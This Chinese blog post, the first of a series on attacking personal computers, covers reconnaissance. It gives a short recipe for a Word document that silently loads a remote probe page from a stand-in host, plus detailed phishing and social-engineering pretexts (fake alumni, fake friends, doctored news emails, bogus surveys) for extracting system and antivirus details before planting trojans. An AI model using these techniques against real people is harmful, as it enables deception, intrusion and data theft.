个人机攻击 (一)

在黑客没有办法通过钓鱼拿到想用的数据的时候,他们就会选择直接攻击用户的个人电脑,直接黑进用户的个人机然后进行数据的查找与下载。

个人机渗透基本分为两个部分:黑客首先会确定目标机器信息,包括杀毒软件和office办公软件以及浏览器等等一些常用软件信息,然后再根据目标个人机的信息谋划最可靠的种马方法。

 

5.1个人机信息获取

黑客会通过获取到的个人机信息制定一套甚至几套种马方案,比如使用用户软件漏洞,又或者针对杀软对木马进行免杀。所以获取个人机信息成为了整个过程最重要的部分。

个人机信息获取可以分为两大类:一种是通过技术层面获取个人机信息,即:通过让目标使用浏览器访问带有探针功能的网页来获取其目标个人机信息,第二种是通过纯社工技术让用户亲口告诉黑客他的个人机信息。

5.1.1探针获取个人机信息

所谓探针就是用php或者asp等语言结合javascript来获取访问者本地计算机的基本信息,针对ie浏览器则可以利用本地文件探测漏洞来获取本地计算机的信息甚至安装的常用软件。黑客只要让目标浏览指定的网页就能轻易的获取用户的电脑信息了,但是不同类型的浏览器会导致抓取的用户信息不同甚至是抓取信息不全面,经测试如果目标使用ie浏览器黑客可以获取到最全面的信息,因此我在这里讲两大类黑客使用探针的方法。

强制用户使用ie浏览器。

黑客是如何让用户强制打开ie来浏览呢?如果你是用户而且你不喜欢使用ie浏览器你在什么情况下才会使用ie呢?在这里我介绍下黑客惯用的两种方法。

1)由于浏览器对js的兼容性不同会导致网页显示结果不同,有些老版本的网站在用户使用非ie浏览器浏览网页的时候会提示让切换到指定版本的ie浏览器来浏览,否则显示不完全。比如有些老版本的fckeditor编辑器在新版本的浏览器全都显示不出来只有在ie6下才能正常使用功能。由此黑客门也常做这样的一个事情,就是当用户打开带有探针的网页的时候,页面首先先判断是否是ie浏览器,如果用户用的不是ie,页面则会弹出提示框让用户切换到ie下来访问。个人机攻击 (一)

2)微软的office套件(03-07)中凡是引用外部网页的功能全是基于ie浏览器的,所以在这里黑客喜欢将探针页面加到word里面,只要用户打开word黑客便能拿到个人机的信息了。下面我介绍一下黑客在word里面加载探针的方法。

  • 新建txt,写入代码<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-

0080c744f389><param name=url value=http://test.com/1.htm></OBJECT>保存为html

  • 用word打开html,然后在插入的网页前面插入需要显示的正文。
  • 另存为文件类型选择xml document然后文件重命名为doc

忽略用户使用浏览器类型

当用户不使用ie浏览器的时候其实也能通过探针获取用户的大部分本地信息,如果在非ie浏览器的情况下能抓到用户的杀软情况以及个人机的大部分信息,黑客也可能不让用户切换ie浏览器。此时他们的任务就仅仅是让用户访问构造好的探针页面就可以了,这里我浅谈两种非ie浏览器使用探针的思路。

1)黑客可以通过调研来发现用户的活动圈子,如果了解不到用户的喜好,就可能会从校友入手,以校友的身份和用户沟通,在信件中写通过他的教授知道了用户的名字,对用户很崇拜,自己现在刚刚进入学校有很多困惑希望得到他的帮助之类的,然后邀请用户为他的博客做一下建议(这个方法成功率很高)。

2)如果当黑客了解到了用户的朋友圈子或者兴趣爱好,他们会伪装为XX的朋友(xx和用户也是好朋友)然后告诉用户他是通过xx的介绍了解到了用户,并且也想和用户做朋友,然后长期保持兴趣相投的邮件交流,并每次都在邮件落款的地方都写上搭建好的博客地址。他们还会经常性的给用户推送自己的博文更新之类的。其实只要发送的内容是用户感兴趣的,成功诱惑到用户点击的几率就会高,比如美女请求facebook或者linkedin好友需要点击确认邮件,目标常去的网站更新提示邮件,各种交友网站的好友请求确认邮件等等,但是邮件最好附带图片并且符合目标的口味。

个人机攻击 (一)

3)新闻推送。黑客用自己的帐号订阅新闻,每天收到新闻后,对信件内容进行修改,将新闻的超连接全部替换为构造好的含有探针的页面。然后发送新闻邮件,并且保持一定的频率,可以持续发一直发,直到用户点击为止。

5.1.2纯社工获取个人机信息

探针不是万能的,有很多情况下探针并不能那么有效的为黑客服务,那么当黑客在不使用探针的情况下怎样获取用户的个人机信息呢?那就只能靠纯社工技术了。大家可以发散思维来构思不同的方法与技巧,这里我也只简单的介绍两种。

一、当黑客了解目标个人信息少,导致很难建立信任关系的情况

问卷调查。伪装成报社或者媒体的身份,向用户发送关于互联网安全的问卷调查,对每位进行回复反馈的邮箱都赠送杀毒软件激活码,充话费等奖品,然后从有效回复中抽一二三等奖等等。问卷调查可以有十个左右的问题,增加一些无用的问题对真实目的进行干扰。获得对方回复后,如果对方是企业邮箱,可以要求对方提供更多的公司邮箱帐号,并向其询问公司是否就操作系统问题与杀毒软件有要求等等。

二、交际圈长期关系渗透

如果让黑客轻易的找到了用户的facebook或者linkedin账户,或者找到了用户常在的论坛等,他们就会通过用户的个人喜好或者交际圈子来伪装成同一个交际圈子的人,然后根据他的个人兴趣来和他一起交流,投其所好,然后进行长期的联系,并发展信任关系。然后可以在某一天黑客联系用户的时候说自己的电脑变卡了好像是中病毒了,趁机询问对方的操作系统版本、杀毒软件等信息,聊天过程中可以试探对方的一些其他信息,比如他常常浏览的网站啦,或者在家上网时间长还是在公司等等。然后黑客会根据这些再去做下一步的渗透,比如入侵目标常用网站or挂马,或搭建目标常用网站模板钓鱼,也可以当得知目标在公司网络 环境时,直接发送文件类似 doc/pdf文件绑定针对目标杀软已免杀的木马,直接获取用户计算器权限,然后直接进行目标公司内网渗透入侵等等。社工无所不能~ 下一章木马邮件构造

此系列为本人2013年的手稿(国外那些年),转载请附带链接并注明来自404网络与安全(404.so)

美食家

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: